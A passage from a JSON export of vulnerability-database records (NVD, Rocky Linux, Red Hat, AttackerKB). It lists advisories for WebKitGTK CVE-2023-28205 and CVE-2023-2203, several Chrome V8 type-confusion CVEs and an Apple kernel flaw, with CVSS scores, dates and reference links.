"AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_tus:8.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:9.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:webkitgtk:webkit2gtk3:2.38.5-1.el9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:webkitgtk:webkit2gtk3:2.38.5-1.el8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T16:25:53", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "cve", "title": "CVE-2022-1096", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-10-27T22:50:00", "cpe": [], "id": "CVE-2022-1096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "rocky": [{"lastseen": "2023-11-08T20:26:34", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 9.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-26T15:29:00", "type": "rocky", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-26T15:29:00", "id": "RLSA-2023:1918", "href": "https://errata.rockylinux.org/RLSA-2023:1918", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T20:26:34", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-26T15:28:43", "type": "rocky", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-26T15:28:43", "id": "RLSA-2023:1919", "href": "https://errata.rockylinux.org/RLSA-2023:1919", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T18:11:08", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the Rocky Linux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-18T19:17:56", "type": "rocky", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-18T19:17:56", "id": "RLSA-2023:3108", "href": "https://errata.rockylinux.org/RLSA-2023:3108", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-11-08T18:39:13", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T14:25:34", "type": "redhat", "title": "(RHSA-2023:1918) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T14:26:00", "id": "RHSA-2023:1918", "href": "https://access.redhat.com/errata/RHSA-2023:1918", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T18:39:13", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T14:40:24", "type": "redhat", "title": "(RHSA-2023:1919) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T14:42:10", "id": "RHSA-2023:1919", "href": "https://access.redhat.com/errata/RHSA-2023:1919", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-09T16:41:24", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the Red Hat Enterprise Linux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-09T11:25:19", "type": "redhat", "title": "(RHSA-2023:2653) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-09T11:25:52", "id": "RHSA-2023:2653", "href": "https://access.redhat.com/errata/RHSA-2023:2653", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T18:39:13", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the Red Hat Enterprise Linux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-16T10:20:20", "type": "redhat", "title": "(RHSA-2023:3108) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-16T10:20:52", "id": "RHSA-2023:3108", "href": "https://access.redhat.com/errata/RHSA-2023:3108", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-11-14T02:29:17", "description": "A flaw was found in the webkitgtk package. An improper input validation issue may lead to a use-after-free vulnerability. This vulnerability allows attackers with network access to pass specially crafted web content files, causing Denial of Service or Arbitrary Code Execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-11T06:00:16", "type": "redhatcve", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-11-14T02:07:20", "id": "RH:CVE-2023-28205", "href": "https://access.redhat.com/security/cve/cve-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:34:57", "description": "No description is available for this CVE.\n", "cvss3": {}, "published": "2022-05-24T15:33:15", "type": "redhatcve", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2022-05-24T15:33:15", "id": "RH:CVE-2022-1364", "href": "https://access.redhat.com/security/cve/cve-2022-1364", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-08T20:35:45", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-05T08:51:40", "type": "redhatcve", "title": "CVE-2023-2203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-17T05:27:42", "id": "RH:CVE-2023-2203", "href": "https://access.redhat.com/security/cve/cve-2023-2203", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-25T18:06:18", "description": "An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2023-28206", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-10-08T00:00:00", "id": "AKB:79231140-E51A-4D22-BCAC-EE105E3A962C", "href": "https://attackerkb.com/topics/cHHio4atNx/cve-2023-28206", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:17", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-10-08T00:00:00", "id": "AKB:134D4E7D-267A-488A-A5A6-579DB92BB20D", "href": "https://attackerkb.com/topics/Dp6JZF5MkT/cve-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:21", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2023-2033", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-10-21T00:00:00", "id": "AKB:07A7A29D-FB0E-4747-8ADD-86F2AF2948C4", "href": "https://attackerkb.com/topics/mIt022p537/cve-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:26", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T00:00:00", "type": "attackerkb", "title": "CVE-2022-3723", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-08T00:00:00", "id": "AKB:64665D95-5095-4796-9404-96BAEED41106", "href": "https://attackerkb.com/topics/4dXwXSTpmo/cve-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:37:24", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2023-10-07T00:00:00", "id": "AKB:FF8776A0-8F09-4620-A059-9AA63732C37D", "href": "https://attackerkb.com/topics/2g85mcptOV/cve-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:33:23", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-4262", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2023-10-08T00:00:00", "id": "AKB:1F95080F-4C69-401E-9659-D6FBB9B68458", "href": "https://attackerkb.com/topics/L9bgkdtjHF/cve-2022-4262", "cvss": {"score": 6.8, "vector": 